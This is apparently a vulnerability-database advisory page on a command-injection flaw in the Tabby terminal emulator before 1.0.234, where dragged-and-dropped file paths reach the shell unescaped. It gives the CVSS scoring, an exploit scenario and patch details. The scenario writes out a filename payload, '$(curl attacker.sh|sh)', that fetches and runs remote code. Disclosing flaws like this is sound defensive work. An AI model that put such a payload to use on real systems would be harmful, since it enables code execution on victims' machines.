Severity by source
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
AV:L and UI:R because the attacker must get the victim to locally drop a file and press Enter; PR:N as no app authentication is needed; C/I/A:H reflect full shell code execution.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
4DescriptionCVE.org
Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.234, Tabby inserts dropped file paths from tabby-electron/src/pathDrop.ts into the active shell without neutralizing command substitution metacharacters such as $(…) and …, so the incomplete CVE-2026-45038 fix for control characters still allows code execution when the victim presses Enter. This issue is fixed in version 1.0.234.
AnalysisAI
Command injection in Tabby (formerly Terminus) terminal emulator before 1.0.234 lets an attacker achieve code execution by tricking a victim into dragging and dropping a crafted file whose path contains shell command-substitution metacharacters ($(...) or backticks). Because the drop handler in tabby-electron/src/pathDrop.ts inserted the raw path into the active shell without neutralizing these characters, the payload runs when the victim presses Enter. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the victim run a vulnerable Tabby build (before 1.0.234), receive an attacker-controlled file whose filesystem path contains shell command-substitution metacharacters such as $(...) or backticks, drag-and-drop that file onto an active terminal tab, and then press Enter to submit the inserted line. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score is 7.8 (High) with vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, indicating high confidentiality, integrity and availability impact but requiring a local vector and user interaction. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker crafts a file whose name/path embeds a command-substitution payload such as $(curl attacker.sh|sh) and delivers it to the victim via a zip, shared folder, or download. The victim drags the file onto their Tabby terminal, which inserts the unescaped path into the active shell; when the victim presses Enter to run what looks like a normal command, the embedded substitution executes with the victim's privileges. … |
| Remediation | Vendor-released patch: 1.0.234 - upgrade Tabby to version 1.0.234 or later, which introduces shell-type-aware path quoting (fix commit e151472b951bbd472ddc0545ec8656e4c0f352da and advisory GHSA-mq9v-2pgm-fxgh at https://github.com/Eugeny/tabby/security/advisories/GHSA-mq9v-2pgm-fxgh). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, inventory all systems running Tabby versions prior to 1.0.234 and communicate to users that drag-and-drop file operations pose security risk; disable drag-and-drop functionality if the application supports this setting. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Remote code execution in Tabby terminal emulator versions prior to 1.0.233 allows unauthenticated attackers to execute a
Local code execution in Tabby terminal emulator versions before 1.0.233 occurs when dragging and dropping files containi
Tabby terminal emulator before version 1.0.232 automatically renders malicious URIs from SSH/Telnet servers as clickable
Local code execution in Tabby terminal emulator versions before 1.0.233 occurs when users view attacker-controlled files
Same weakness CWE-77 – Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44692